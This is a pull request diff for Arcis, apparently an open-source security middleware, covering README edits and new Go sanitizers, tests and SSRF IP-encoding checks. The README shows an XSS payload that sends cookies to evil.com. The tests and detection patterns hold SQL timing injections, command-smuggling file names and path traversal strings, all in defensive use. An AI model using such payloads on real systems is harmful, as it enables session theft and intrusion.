### PR TITLE
feat(website): documentation + main polish

### DIFF
--- a/README.md
+++ b/README.md
@@ -11,7 +11,7 @@
 [![PyPI version](https://img.shields.io/pypi/v/arcis.svg)](https://pypi.org/project/arcis/)
 [![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](https://opensource.org/licenses/MIT)
 [![CI](https://github.com/Gagancm/arcis/actions/workflows/ci.yml/badge.svg?branch=nwl)](https://github.com/Gagancm/arcis/actions/workflows/ci.yml)
-[![Tests](https://img.shields.io/badge/tests-2774%2B-brightgreen.svg)](https://github.com/Gagancm/arcis)
+[![Tests](https://img.shields.io/badge/tests-2800%2B-brightgreen.svg)](https://github.com/Gagancm/arcis)
 
 Arcis is a unified, zero-dependency security middleware for Node.js, Python, and Go. <br />
 One line of code protects your application against 20+ security flaws at runtime — XSS, SQL injection, SSRF, CSRF, HPP, and more.
@@ -395,10 +395,10 @@ All SDKs are tested against a shared set of test vectors (`TEST_VECTORS.json`) t
 
 | SDK | Tests | Framework | Status |
 |-----|-------|-----------|--------|
-| Node.js | 1,289 | vitest | All passing |
-| Python | 1,005 | pytest | All passing |
-| Go | 480 | go test -race | All passing |
-| **Total** | **2,774** | | |
+| Node.js | 1,298 | vitest | All passing |
+| Python | 1,011 | pytest | All passing |
+| Go | 483+ | go test -race | All passing |
+| **Total** | **2,792+** | | |
 
 ---
 
@@ -444,20 +444,22 @@ The attack is removed. The safe text passes through. No one gets hacked.
 
 ## Roadmap
 
-### Completed (v1.0 — v1.2)
+### Completed (v1.0 — v1.4)
 
 - 20+ security flaw coverage (runtime + detection)
 - 3 SDKs (Node.js, Python, Go) at full parity
 - 7 framework adapters (Express, FastAPI, Flask, Django, Gin, Echo, net/http)
 - 3 rate limiting algorithms (fixed, sliding, token bucket)
 - Redis store support
-- `arcis scan` + `arcis audit` CLI tools
-- 2,774 tests, published on npm + PyPI
-
-### Next (v1.3)
-
-- Context-aware XSS encoding (HTML attributes, JS strings, URLs, CSS)
-- Additional security headers (COOP, CORP, COEP)
+- `arcis scan` + `arcis audit` + `arcis sca` CLI tools
+- Context-aware output encoding (HTML body, attributes, JS, CSS, URL)
+- COOP, CORP, COEP cross-origin isolation headers
+- HPP (HTTP Parameter Pollution) protection
+- CSRF hardening (double-submit cookie + HMAC)
+- LDAP injection protection
+- SSTI and XXE sanitization across all 3 SDKs
+- Security bypass hardening (Unicode normalization, decimal/octal IP encoding, surrogate pairs)
+- 2,792+ tests, published on npm + PyPI
 
 ### Planned
 

--- a/README.md
+++ b/README.md
@@ -1,11 +1,11 @@
 > [!NOTE]
-> **New: `arcis sca` — Supply Chain Attack Scanner. Detects compromised axios (npm) and litellm (PyPI) packages from the March 2026 supply chain attacks. [Learn more →](#cli-tools)**
+> **New: `arcis sca`: supply chain attack scanner. Detects compromised axios (npm) and litellm (PyPI) packages from the March 2026 supply chain attacks. [Learn more →](#cli-tools)**
 
 <div align="center">
 
-<img src="./arcis.webp" alt="Arcis — Runtime Security Middleware for Web Apps" width="100%">
+<img src="./arcis.webp" alt="Arcis: Runtime Security Middleware for Web Apps" width="100%">
 
-# Arcis — Security Middleware for Every Backend
+# Arcis: Security Middleware for Every Backend
 
 [![npm version](https://img.shields.io/npm/v/@arcis/node.svg)](https://www.npmjs.com/package/@arcis/node)
 [![PyPI version](https://img.shields.io/pypi/v/arcis.svg)](https://pypi.org/project/arcis/)
@@ -13,8 +13,8 @@
 [![CI](https://github.com/Gagancm/arcis/actions/workflows/ci.yml/badge.svg?branch=nwl)](https://github.com/Gagancm/arcis/actions/workflows/ci.yml)
 [![Tests](https://img.shields.io/badge/tests-2800%2B-brightgreen.svg)](https://github.com/Gagancm/arcis)
 
-Arcis is a unified, zero-dependency security middleware for Node.js, Python, and Go. <br />
-One line of code protects your application against 20+ security flaws at runtime — XSS, SQL injection, SSRF, CSRF, HPP, and more.
+Arcis is a zero-dependency security middleware for Node.js, Python, and Go. <br />
+One line of code protects your application against XSS, SQL injection, SSRF, CSRF, HPP, path traversal, and 15+ more attack types at runtime.
 
 **Install once. Protect everything.**
 
@@ -24,17 +24,15 @@ One line of code protects your application against 20+ security flaws at runtime
 
 ## What is Arcis?
 
-Arcis is a security middleware library that protects web applications against 20+ security flaws at runtime. It works with **Node.js**, **Python**, and **Go** — the three most popular backend languages — with a consistent API across all three.
+Arcis is a security middleware library that protects web applications against 20+ attack types at runtime. It works with **Node.js**, **Python**, and **Go**, with a consistent API across all three.
 
-Arcis sits between incoming requests and your application code. It sanitizes input, detects attack patterns, enforces rate limits, sets security headers, and blocks malicious traffic — all before your code ever sees the request. Only proven, pattern-matched threats are blocked. Safe input passes through untouched.
+Arcis sits between incoming requests and your application code. It sanitizes input, detects attack patterns, enforces rate limits, sets security headers, and blocks malicious traffic before your code ever sees the request. Only proven, pattern-matched threats are blocked. Safe input passes through untouched.
 
 **Why Arcis Exists**
 
-To properly secure a web application today, you need **8-12 separate libraries** — `helmet`, `DOMPurify`, `express-rate-limit`, `csurf`, `cors`, `hpp`, `express-validator`, and more. Each has its own API, its own configuration, and its own update cycle. Most developers skip half of them because the setup is too complex.
+To properly secure a web application today, you need 8-12 separate libraries: `helmet`, `DOMPurify`, `express-rate-limit`, `csurf`, `cors`, `hpp`, `express-validator`, and more. Each has its own API, its own configuration, and its own update cycle. Most developers skip half of them because the setup is too complex.
 
-With AI tools like Copilot and Cursor writing production code faster than ever, the security gap is widening. AI generates code fast, but doesn't understand your threat model — and security review can't keep up.
-
-Arcis replaces all of those libraries with **one package and one line of code**. No security expertise required.
+Arcis replaces all of those with one package and one line of code.
 
 ## Arcis in Action
 
@@ -55,15 +53,14 @@ At the checkpoint, Arcis:
 
 ## Features
 
-- **One-Line Setup**: A single `app.use(arcis())` activates core protections — sanitization, rate limiting, and security headers. CSRF, CORS, cookies, bot detection, and error handling are available as additional opt-in middleware.
-- **20+ Security Flaws Handled**: Covers XSS, SQL/NoSQL injection, command injection, path traversal, SSTI, XXE, SSRF, CSRF, HPP, prototype pollution, header injection, open redirect, and more.
-- **Zero Dependencies**: Core is entirely self-contained — no transitive dependencies, no supply chain risk. Go framework adapters (Gin, Echo) are optional and bring only the framework you already use.
-- **Three-Language Parity**: Same API, same behavior, same test results across Node.js, Python, and Go. Enforced by shared test vectors.
-- **Framework-Agnostic Core**: Core functions (sanitizers, validators, encoders) work with plain strings and objects — no framework lock-in. Built-in adapters for Express, FastAPI, Flask, Django, Gin, and Echo.
-- **Contract-First Design**: Every feature starts as a specification (`API_SPEC.md` + `TEST_VECTORS.json`), not code. If two SDKs produce different output for the same input, one has a bug.
-- **Context-Aware Output Encoding**: `encodeForHtml()`, `encodeForJs()`, `encodeForUrl()`, `encodeForCss()`, `encodeForAttribute()` — utility functions for the right encoding in every output context. Call these manually when rendering user content.
-- **Supply Chain Attack Detection**: `arcis sca` detects compromised packages from known supply chain attacks (axios, litellm) — checks lockfiles, `node_modules`, and Python environments for malicious versions and backdoor artifacts.
-- **Static Analysis CLI**: `arcis scan` and `arcis audit` detect unsafe patterns (`eval()`, `pickle.loads()`, `innerHTML`, SQL concat, SSRF sinks, path traversal sinks, unsafe deserializers, weak crypto) — 14 rules across Python, JS, and TypeScript.
+- **One-line setup**: `app.use(arcis())` activates sanitization, rate limiting, and security headers. CSRF, CORS, cookies, bot detection, and error handling are opt-in middleware.
+- **20+ attack types**: XSS, SQL/NoSQL injection, command injection, path traversal, SSTI, XXE, SSRF, CSRF, HPP, prototype pollution, header injection, open redirect, LDAP injection.
+- **Zero dependencies**: Core is self-contained with no transitive dependencies. Go framework adapters (Gin, Echo) are optional.
+- **Three-language parity**: Same API, same behavior, same test results across Node.js, Python, and Go. Enforced by shared test vectors.
+- **Framework-agnostic core**: Sanitizers, validators, and encoders work with plain strings and objects. No framework lock-in. Adapters for Express, FastAPI, Flask, Django, Gin, and Echo.
+- **Context-aware output encoding**: `encodeForHtml()`, `encodeForJs()`, `encodeForUrl()`, `encodeForCss()`, `encodeForAttribute()` for safe rendering in every output context.
+- **Supply chain scanner**: `arcis sca` checks lockfiles, `node_modules`, and Python environments against a database of known compromised packages.
+- **Static analysis CLI**: `arcis scan` and `arcis audit` flag unsafe patterns (`eval()`, `pickle.loads()`, `innerHTML`, SQL concat, SSRF sinks, weak crypto) across 14 rules.
 
 ## Threat Coverage
 
@@ -84,7 +81,7 @@ At the checkpoint, Arcis:
 | **CSRF** | Double-submit cookie, token generation and validation |
 | **Rate Limiting** | Per-IP, sliding window, token bucket, in-memory or Redis, `X-RateLimit-*` headers |
 | **Bot Detection** | 80+ patterns, 7 categories (crawlers, scrapers, AI bots, etc.), behavioral signals |
-| **Security Headers** | CSP, HSTS, X-Frame-Options, COOP, CORP, COEP, Origin-Agent-Cluster, X-DNS-Prefetch-Control — 16 headers |
+| **Security Headers** | CSP, HSTS, X-Frame-Options, COOP, CORP, COEP, Origin-Agent-Cluster, X-DNS-Prefetch-Control (16 headers) |
 | **Error Leakage** | Stack traces, DB errors, connection strings, internal IPs scrubbed in production |
 | **CORS** | Whitelist-based origins, `null` origin blocked, `Vary: Origin` enforced |
 | **Cookie Security** | HttpOnly, Secure, SameSite enforced on all cookies |
@@ -173,7 +170,7 @@ That's it. Your application is now protected against 20+ security flaws.
 
 ## Framework Guides
 
-### Node.js — Express (Built-in Adapter)
+### Node.js (Express)
 
 ```js
 import { arcis } from '@arcis/node';
@@ -182,7 +179,7 @@ const app = express();
 app.use(arcis());
 ```
 
-### Node.js — Any Framework (Fastify, Koa, Hono, etc.)
+### Node.js (Fastify, Koa, Hono, etc.)
 
 The core functions have zero framework dependencies. Use them directly:
 
@@ -215,7 +212,7 @@ app.use('*', async (c, next) => {
 
 ## Core Functions (Framework-Agnostic)
 
-Every function below works with plain strings and objects — no `req`, `res`, or framework dependency. Use them in Express, Fastify, Koa, Hono, Nest, Bun, Deno, serverless, or anywhere else.
+Every function below works with plain strings and objects. No `req`, `res`, or framework dependency. Works in Express, Fastify, Koa, Hono, Nest, Bun, Deno, serverless, or anywhere else.
 
 ```js
 import {
@@ -270,8 +267,8 @@ arcis sca --list-threats
 
 | Attack | Malicious Versions | Vector | Source |
 |--------|-------------------|--------|--------|
-| **axios (npm)** — March 2026 | 1.14.1, 0.30.4 | Trojanized dependency `plain-crypto-js` deploys a RAT via postinstall | [npm Security Advisory](https://github.com/axios/axios/security/advisories) |
-| **litellm (PyPI)** — March 2026 | 1.82.7, 1.82.8 | Credential harvester + persistent `.pth` backdoor that survives `pip uninstall` | [PyPI Security Advisory](https://github.com/BerriAI/litellm/security/advisories) |
+| **axios (npm)**, March 2026 | 1.14.1, 0.30.4 | Trojanized dependency `plain-crypto-js` deploys a RAT via postinstall | [npm Security Advisory](https://github.com/axios/axios/security/advisories) |
+| **litellm (PyPI)**, March 2026 | 1.82.7, 1.82.8 | Credential harvester + persistent `.pth` backdoor that survives `pip uninstall` | [PyPI Security Advisory](https://github.com/BerriAI/litellm/security/advisories) |
 
 **What it checks:**
 - `package-lock.json` (v1 and v3), `yarn.lock`, `node_modules/` on disk
@@ -281,7 +278,7 @@ arcis sca --list-threats
 
 Exit code 1 if compromised (CI-friendly).
 
-**Offline by design** — no network calls, no telemetry, no external requests. The scanner reads your local files only. You can audit every detection in [`arcis/data/threat-db.json`](packages/arcis-python/arcis/data/threat-db.json). New supply chain attacks are added as they're publicly disclosed, each with a source advisory link.
+**Offline by design.** No network calls, no telemetry, no external requests. The scanner reads your local files only. Every detection can be audited in [`arcis/data/threat-db.json`](packages/arcis-python/arcis/data/threat-db.json). New supply chain attacks are added as they're publicly disclosed, each with a source advisory link.
 
 ---
 
@@ -371,9 +368,9 @@ Response sent to client
 | **Zero Dependencies** | Self-contained. No transitive dependencies. Zero supply chain risk. |
 | **Fail Open** | If infrastructure (Redis) fails, allow requests through. Availability > denial. |
 | **Defensive Defaults** | Secure out of the box. Users opt OUT of protection, not in. |
-| **Remove Then Encode** | Strip dangerous patterns before encoding — prevents bypasses. |
+| **Remove Then Encode** | Strip dangerous patterns before encoding. Encoding first hides them from pattern matching. |
 | **Cross-SDK Parity** | Same input → same output in all three languages. Enforced by shared test vectors. |
-| **Idempotent** | `sanitize(sanitize(x)) === sanitize(x)` — safe input is never corrupted. |
+| **Idempotent** | `sanitize(sanitize(x)) === sanitize(x)`. Safe input is never corrupted. |
 
 ---
 
@@ -385,7 +382,7 @@ Response sent to client
 | **Python** | Flask, FastAPI, Django | Work standalone | Stable |
 | **Go** | net/http, Gin, Echo | Work standalone | Beta |
 
-**Node.js roadmap:** Built-in adapters for Fastify, Koa, and Hono are planned. The core functions already work with these frameworks today.
+**Node.js:** Built-in adapters for Fastify, Koa, and Hono are planned. The core functions already work with these frameworks today.
 
 ---
 
@@ -406,19 +403,19 @@ All SDKs are tested against a shared set of test vectors (`TEST_VECTORS.json`) t
 
 All SDKs load security patterns from a shared `patterns.json` at runtime. A shared specification (`API_SPEC.md`) and test vectors (`TEST_VECTORS.json`) enforce identical behavior across languages.
 
-**Real-world example — without Arcis:**
+**Example: without Arcis**
 
-A hacker posts this comment on your blog:
+A user posts this comment:
 ```
 Great article! <script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
 ```
-This steals every visitor's login session.
+That script runs in every visitor's browser and steals their session cookie.
 
-**With Arcis**, the comment becomes:
+**With Arcis**, the stored value becomes:
 ```
 Great article!
 ```
-The attack is removed. The safe text passes through. No one gets hacked.
+The script is stripped. The rest of the comment is saved normally.
 
 ---
 
@@ -444,7 +441,7 @@ The attack is removed. The safe text passes through. No one gets hacked.
 
 ## Roadmap
 
-### Completed (v1.0 — v1.4)
+### Completed (v1.0 to v1.4)
 
 - 20+ security flaw coverage (runtime + detection)
 - 3 SDKs (Node.js, Python, Go) at full parity
@@ -463,12 +460,12 @@ The attack is removed. The safe text passes through. No one gets hacked.
 
 ### Planned
 
-- Security Score (`arcis scan --score`) — actionable 0-100 score
-- AI Crawler Detection — block GPTBot, ClaudeBot, etc.
-- Advanced Rate Limiting — IPv6 subnet grouping, penalty/reward, dynamic limits
-- Runtime Telemetry — dashboard showing attacks blocked, top vectors, trending threats
-- GitHub Action — automatic security checks on every PR
-- VS Code Extension — real-time security warnings while coding
+- Security Score: `arcis scan --score` returns an actionable 0-100 score
+- AI Crawler Detection: block GPTBot, ClaudeBot, etc.
+- Advanced Rate Limiting: IPv6 subnet grouping, penalty/reward, dynamic limits
+- Runtime Telemetry: dashboard showing attacks blocked, top vectors, trending threats
+- GitHub Action: automatic security checks on every PR
+- VS Code Extension: real-time security warnings while coding
 
 For full roadmap details, see the [Wiki](https://github.com/Gagancm/arcis/wiki).
 
@@ -482,7 +479,7 @@ Arcis is a strong defense layer, but it is not a silver bullet:
 
 | Concern | Why Middleware Isn't Enough | What You Still Need |
 |---------|---------------------------|---------------------|
-| SQL injection | Arcis detects and strips known SQL patterns from input — it does **not** enforce parameterized queries. Regex detection is a complementary layer, not a substitute. | Always use parameterized queries or an ORM. Arcis is defense-in-depth, not your primary SQL defense. |
+| SQL injection | Arcis detects and strips known SQL patterns from input. It does **not** enforce parameterized queries. Regex detection is a complementary layer, not a substitute. | Always use parameterized queries or an ORM. Arcis is defense-in-depth, not your primary SQL defense. |
 | Rate limiting | Arcis rate limits at the application layer (per-process, with optional Redis for distributed). It does **not** replace proxy-level or load-balancer-level limiting. | Use nginx/Cloudflare/ALB rate limiting as your first line. Arcis catches what slips through. |
 | Business logic flaws | Only your code knows your business rules | Application-specific validation |
 | Authentication | Arcis protects auth flows but doesn't implement auth | Use a proper auth library (Passport, Auth0, etc.) |
@@ -493,7 +490,7 @@ Arcis is a strong defense layer, but it is not a silver bullet:
 
 Arcis uses regex-based pattern matching for attack detection. This is a deliberate trade-off: zero dependencies and minimal overhead, at the cost of not having a full HTML/SQL parser.
 
-**SQL injection specifically:** Arcis strips known SQL attack patterns from user input as a defense-in-depth layer. This is **not a replacement for parameterized queries** — it is an additional barrier. Your database layer should always use parameterized queries or a safe ORM. Arcis catches what gets past your primary defense.
+**SQL injection specifically:** Arcis strips known SQL attack patterns from user input as a defense-in-depth layer. This is **not a replacement for parameterized queries**. It is an additional barrier. Your database layer should always use parameterized queries or a safe ORM.
 
 **Rate limiting specifically:** Application-level rate limiting protects against floods reaching your application code. For high-traffic production systems, this should complement proxy-level or CDN-level rate limiting (nginx, Cloudflare, AWS ALB), not replace it. Arcis supports Redis-backed distributed rate limiting for multi-instance deployments.
 
@@ -508,7 +505,7 @@ Detailed configuration, API reference, Redis setup, granular middleware usage, a
 ## Contributing
 
 1. Fork the repo and create your branch from `nwl` (the active development branch)
-2. All PRs target `nwl` — `main` is release-only
+2. All PRs target `nwl` (`main` is release-only)
 3. All changes must pass existing tests (CI runs automatically on PRs)
 4. New features require test cases aligned with `spec/TEST_VECTORS.json`
 5. Pattern changes in `packages/core/patterns.json` must be reflected in all SDKs
@@ -522,7 +519,7 @@ Detailed configuration, API reference, Redis setup, granular middleware usage, a
 
 Arcis Core is released under the [MIT License](LICENSE).
 
-You are free to use, modify, and distribute Arcis in any project — commercial or otherwise — with no restrictions.
+You are free to use, modify, and distribute Arcis in any project, commercial or otherwise, with no restrictions.
 
 ---
 

--- a/packages/arcis-go/core/config.go
+++ b/packages/arcis-go/core/config.go
@@ -24,6 +24,8 @@ type Config struct {
 	SanitizeNoSQL bool
 	SanitizePath  bool
 	SanitizeCmd   bool // Command injection protection
+	SanitizeSSTI  bool // Server-Side Template Injection protection
+	SanitizeXXE   bool // XML External Entity protection
 	MaxInputSize  int  // Maximum input size in bytes (default: 1MB)
 
 	// Rate limiter options

--- a/packages/arcis-go/middleware/rate_limit.go
+++ b/packages/arcis-go/middleware/rate_limit.go
@@ -143,6 +143,10 @@ func (rl *RateLimiter) CheckKey(key string) core.RateLimitResult {
 }
 
 func (rl *RateLimiter) checkKeyWithStore(key string) core.RateLimitResult {
+	// Serialize access to custom store to prevent TOCTOU race between Get and Set/Increment.
+	rl.mu.Lock()
+	defer rl.mu.Unlock()
+
 	now := time.Now()
 
 	entry := rl.customStore.Get(key)

--- a/packages/arcis-go/sanitizers/ldap.go
+++ b/packages/arcis-go/sanitizers/ldap.go
@@ -3,7 +3,6 @@ package sanitizers
 import (
 	"fmt"
 	"regexp"
-	"strings"
 )
 
 // LDAP injection prevention.
@@ -48,10 +47,7 @@ func SanitizeLdapFilter(input string) string {
 //	SanitizeLdapDn("cn=admin,dc=example")
 //	// Returns: "cn\3dadmin\2cdc\3dexample"
 func SanitizeLdapDn(input string) string {
-	// First escape filter chars, then DN-specific chars
-	result := strings.NewReplacer().Replace(input)
-	result = ldapDnChars.ReplaceAllStringFunc(input, escapeLdapChar)
-	return result
+	return ldapDnChars.ReplaceAllStringFunc(input, escapeLdapChar)
 }
 
 // DetectLdapInjection checks if a string contains LDAP injection patterns.

--- a/packages/arcis-go/sanitizers/sanitize.go
+++ b/packages/arcis-go/sanitizers/sanitize.go
@@ -5,6 +5,7 @@ import (
 	"strings"
 
 	"github.com/GagancM/arcis/core"
+	"golang.org/x/text/unicode/norm"
 )
 
 // Pre-compiled XSS patterns for performance (ReDoS-safe)
@@ -38,6 +39,8 @@ var sqlPatterns = []*regexp.Regexp{
 	regexp.MustCompile(`(?i)\bAND\s+['"][^'"]+['"]\s*=\s*['"][^'"]+['"]`),
 	regexp.MustCompile(`(?i)\bSLEEP\s*\(\s*\d+\s*\)`),
 	regexp.MustCompile(`(?i)\bBENCHMARK\s*\(`),
+	regexp.MustCompile(`(?i)\bpg_sleep\s*\(`),
+	regexp.MustCompile(`(?i)\bWAITFOR\s+DELAY\b`),
 }
 
 // Pre-compiled path traversal patterns
@@ -52,8 +55,47 @@ var pathPatterns = []*regexp.Regexp{
 var cmdPatterns = []*regexp.Regexp{
 	regexp.MustCompile(`[;&|` + "`" + `]`),
 	regexp.MustCompile(`\$\(`),
-	regexp.MustCompile(`(?i)%0[aAdD]`),
+	regexp.MustCompile(`(?i)%0[0-9a-fA-F]`),
 	regexp.MustCompile(`(>>|<<|[<>]\s+[/\w])`),
+}
+
+// Pre-compiled SSTI (Server-Side Template Injection) detection patterns.
+// Matches Node.js/Python SSTI implementation for cross-SDK parity.
+var sstiDetectPatterns = []*regexp.Regexp{
+	regexp.MustCompile(`\{\{.*?\}\}`),                                                     // Jinja2 / Twig / Nunjucks
+	regexp.MustCompile(`\$\{.*?\}`),                                                       // Freemarker / Spring EL
+	regexp.MustCompile(`<%[\s\S]*?%>`),                                                    // ERB / EJS
+	regexp.MustCompile(`#\{.*?\}`),                                                        // Pug / Jade
+	regexp.MustCompile(`(?i)__(?:class|mro|subclasses|globals|builtins|import)__`),         // Python dunder
+	regexp.MustCompile(`(?i)\{\{\s*config[.\[]`),                                          // Jinja2 config leak
+	regexp.MustCompile(`(?i)\{\{\s*(?:self|request|lipsum|cycler|joiner|namespace|range)\b`), // Jinja2 objects
+}
+
+// SSTI removal patterns — narrowed to avoid false positives on legitimate ${name}.
+// Only strip ${...} and #{...} when operators are present inside the expression.
+var sstiRemovePatterns = []*regexp.Regexp{
+	regexp.MustCompile(`\{\{.*?\}\}`),                           // Jinja2 / Twig
+	regexp.MustCompile(`\$\{[^}]*[?!()*+\-/][^}]*\}`),          // Freemarker with operators
+	regexp.MustCompile(`<%[\s\S]*?%>`),                          // ERB / EJS
+	regexp.MustCompile(`#\{[^}]*[?!()*+\-/][^}]*\}`),           // Pug with operators
+	regexp.MustCompile(`(?i)__(?:class|mro|subclasses|globals|builtins|import)__`),
+}
+
+// Pre-compiled XXE (XML External Entity) detection patterns.
+var xxeDetectPatterns = []*regexp.Regexp{
+	regexp.MustCompile(`(?i)<!DOCTYPE\b`),
+	regexp.MustCompile(`(?i)<!ENTITY\b`),
+	regexp.MustCompile(`(?i)\bSYSTEM\s+["']`),
+	regexp.MustCompile(`(?i)\bPUBLIC\s+["']`),
+	regexp.MustCompile(`%\s*\w+\s*;`),        // Parameter entity
+	regexp.MustCompile(`(?i)<!\[CDATA\[`),
+}
+
+// XXE removal patterns
+var xxeRemovePatterns = []*regexp.Regexp{
+	regexp.MustCompile(`(?i)<!DOCTYPE\s[^[>]*(?:\[[^\]]*\]\s*)?>|<!DOCTYPE\s[^>]*>`),
+	regexp.MustCompile(`(?i)<!ENTITY[^>]*>`),
+	regexp.MustCompile(`(?i)<!\[CDATA\[[\s\S]*?\]\]>`),
 }
 
 // NoSQL dangerous keys that could be used for injection.
@@ -107,6 +149,8 @@ type Sanitizer struct {
 	nosql        bool
 	path         bool
 	cmd          bool
+	ssti         bool
+	xxe          bool
 	maxInputSize int
 }
 
@@ -122,6 +166,8 @@ func NewSanitizer(config core.Config) *Sanitizer {
 		nosql:        config.SanitizeNoSQL,
 		path:         config.SanitizePath,
 		cmd:          config.SanitizeCmd,
+		ssti:         config.SanitizeSSTI,
+		xxe:          config.SanitizeXXE,
 		maxInputSize: maxSize,
 	}
 }
@@ -179,6 +225,9 @@ func (s *Sanitizer) SanitizeString(value string) string {
 	// Path traversal prevention — loop until stable to prevent bypass via
 	// nested sequences: "....//".replace("../","") → "../"
 	if s.path {
+		// SECURITY: Normalize Unicode to NFKC before path pattern matching.
+		// Fullwidth dot U+FF0E normalizes to '.', preventing bypass of ../ detection.
+		result = norm.NFKC.String(result)
 		for {
 			prev := result
 			for _, pattern := range pathPatterns {
@@ -194,6 +243,20 @@ func (s *Sanitizer) SanitizeString(value string) string {
 	if s.cmd {
 		for _, pattern := range cmdPatterns {
 			result = pattern.ReplaceAllString(result, "[BLOCKED]")
+		}
+	}
+
+	// SSTI prevention
+	if s.ssti {
+		for _, pattern := range sstiRemovePatterns {
+			result = pattern.ReplaceAllString(result, "")
+		}
+	}
+
+	// XXE prevention
+	if s.xxe {
+		for _, pattern := range xxeRemovePatterns {
+			result = pattern.ReplaceAllString(result, "")
 		}
 	}
 

--- a/packages/arcis-go/sanitizers/sanitize_test.go
+++ b/packages/arcis-go/sanitizers/sanitize_test.go
@@ -54,12 +54,40 @@ func TestSanitizeString_SQL(t *testing.T) {
 		{"removes DELETE", "1; DELETE FROM users", "DELETE"},
 		{"removes SQL comments", "admin'--", "--"},
 		{"removes UNION", "1 /* comment */ UNION SELECT", "UNION"},
+		{"removes pg_sleep (PostgreSQL timing)", "1; SELECT pg_sleep(5)", "pg_sleep"},
+		{"removes WAITFOR DELAY (MSSQL timing)", "1; WAITFOR DELAY '0:0:5'", "WAITFOR"},
 	}
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			result := sanitizer.SanitizeString(tt.input)
 			if strings.Contains(strings.ToUpper(result), strings.ToUpper(tt.notContains)) {
+				t.Errorf("SanitizeString(%q) = %q, should not contain %q", tt.input, result, tt.notContains)
+			}
+		})
+	}
+}
+
+func TestSanitizeString_CommandInjection(t *testing.T) {
+	sanitizer := NewSanitizerWithOptions(false, false, false, false, true)
+
+	tests := []struct {
+		name        string
+		input       string
+		notContains string
+	}{
+		{"removes %0a (newline)", "file.txt%0aid", "%0a"},
+		{"removes %0d (carriage return)", "file.txt%0dwhoami", "%0d"},
+		{"removes %0B (vertical tab)", "file.txt%0Bwhoami", "%0B"},
+		{"removes %0C (form feed)", "file.txt%0Cwhoami", "%0C"},
+		{"removes %09 (tab)", "file.txt%09whoami", "%09"},
+		{"removes %00 (null byte)", "file.txt%00whoami", "%00"},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			result := sanitizer.SanitizeString(tt.input)
+			if strings.Contains(strings.ToLower(result), strings.ToLower(tt.notContains)) {
 				t.Errorf("SanitizeString(%q) = %q, should not contain %q", tt.input, result, tt.notContains)
 			}
 		})
@@ -77,6 +105,8 @@ func TestSanitizeString_PathTraversal(t *testing.T) {
 		{"removes unix path traversal", "../../etc/passwd", "../"},
 		{"removes windows path traversal", "..\\..\\windows\\system32", "..\\"},
 		{"removes URL-encoded traversal", "%2e%2e%2f%2e%2e%2f", "%2e%2e"},
+		{"removes fullwidth dot traversal (U+FF0E)", "\uFF0E\uFF0E/etc/passwd", "../"},
+		{"removes fullwidth slash traversal (U+FF0F)", "..\uFF0Fetc", ".."},
 	}
 
 	for _, tt := range tests {

--- a/packages/arcis-go/sanitizers/standalone.go
+++ b/packages/arcis-go/sanitizers/standalone.go
@@ -122,6 +122,50 @@ func DetectCommandInjection(input string) bool {
 	return false
 }
 
+// SanitizeSSTI removes SSTI patterns from input.
+func SanitizeSSTI(input string) string {
+	result := input
+	for _, pattern := range sstiRemovePatterns {
+		result = pattern.ReplaceAllString(result, "")
+	}
+	return result
+}
+
+// SanitizeXXE removes XXE patterns from input.
+func SanitizeXXE(input string) string {
+	result := input
+	for _, pattern := range xxeRemovePatterns {
+		result = pattern.ReplaceAllString(result, "")
+	}
+	return result
+}
+
+// DetectSSTI checks if input contains SSTI patterns.
+func DetectSSTI(input string) bool {
+	if input == "" {
+		return false
+	}
+	for _, pattern := range sstiDetectPatterns {
+		if pattern.MatchString(input) {
+			return true
+		}
+	}
+	return false
+}
+
+// DetectXXE checks if input contains XXE patterns.
+func DetectXXE(input string) bool {
+	if input == "" {
+		return false
+	}
+	for _, pattern := range xxeDetectPatterns {
+		if pattern.MatchString(input) {
+			return true
+		}
+	}
+	return false
+}
+
 // DetectNoSQLInjection checks if a map contains NoSQL injection operators.
 // It recursively walks the map up to maxDepth levels deep.
 func DetectNoSQLInjection(data map[string]interface{}, maxDepth int) bool {

--- a/packages/arcis-go/utils/url.go
+++ b/packages/arcis-go/utils/url.go
@@ -101,6 +101,20 @@ func ValidateURL(rawURL string, opts *ValidateURLOptions) ValidateURLResult {
 		}
 	}
 
+	// Check decimal IP encoding (e.g., 2130706433 = 127.0.0.1)
+	if !opts.AllowLocalhost || !opts.AllowPrivate {
+		if reason := checkDecimalIP(hostname, opts.AllowLocalhost, opts.AllowPrivate); reason != "" {
+			return ValidateURLResult{Safe: false, Reason: reason}
+		}
+	}
+
+	// Check octal/hex IP encoding (e.g., 0177.0.0.1 = 127.0.0.1, 0x7f.0.0.1 = 127.0.0.1)
+	if !opts.AllowLocalhost || !opts.AllowPrivate {
+		if reason := checkOctalHexIP(hostname, opts.AllowLocalhost, opts.AllowPrivate); reason != "" {
+			return ValidateURLResult{Safe: false, Reason: reason}
+		}
+	}
+
 	// Check private IPs
 	if !opts.AllowPrivate {
 		if reason := checkPrivateIP(hostname); reason != "" {
@@ -153,5 +167,91 @@ func checkPrivateIP(hostname string) string {
 		return "private IPv6 address"
 	}
 
+	return ""
+}
+
+// checkDecimalIP detects decimal-encoded IPs (e.g., 2130706433 = 127.0.0.1).
+func checkDecimalIP(hostname string, allowLocalhost, allowPrivate bool) string {
+	// Must be all digits
+	if len(hostname) == 0 {
+		return ""
+	}
+	for _, c := range hostname {
+		if c < '0' || c > '9' {
+			return ""
+		}
+	}
+
+	num, err := strconv.ParseUint(hostname, 10, 64)
+	if err != nil || num > 0xFFFFFFFF {
+		return ""
+	}
+
+	a := byte(num >> 24)
+	b := byte(num >> 16)
+	c := byte(num >> 8)
+	d := byte(num)
+	dotted := strconv.Itoa(int(a)) + "." + strconv.Itoa(int(b)) + "." + strconv.Itoa(int(c)) + "." + strconv.Itoa(int(d))
+
+	if !allowLocalhost && a == 127 {
+		return "loopback address (decimal IP: " + dotted + ")"
+	}
+	if !allowPrivate {
+		if reason := checkPrivateIP(dotted); reason != "" {
+			return reason + " (decimal IP: " + dotted + ")"
+		}
+	}
+	return ""
+}
+
+// checkOctalHexIP detects octal/hex-encoded IPs (e.g., 0177.0.0.1, 0x7f.0.0.1 = 127.0.0.1).
+func checkOctalHexIP(hostname string, allowLocalhost, allowPrivate bool) string {
+	parts := strings.Split(hostname, ".")
+	if len(parts) != 4 {
+		return ""
+	}
+
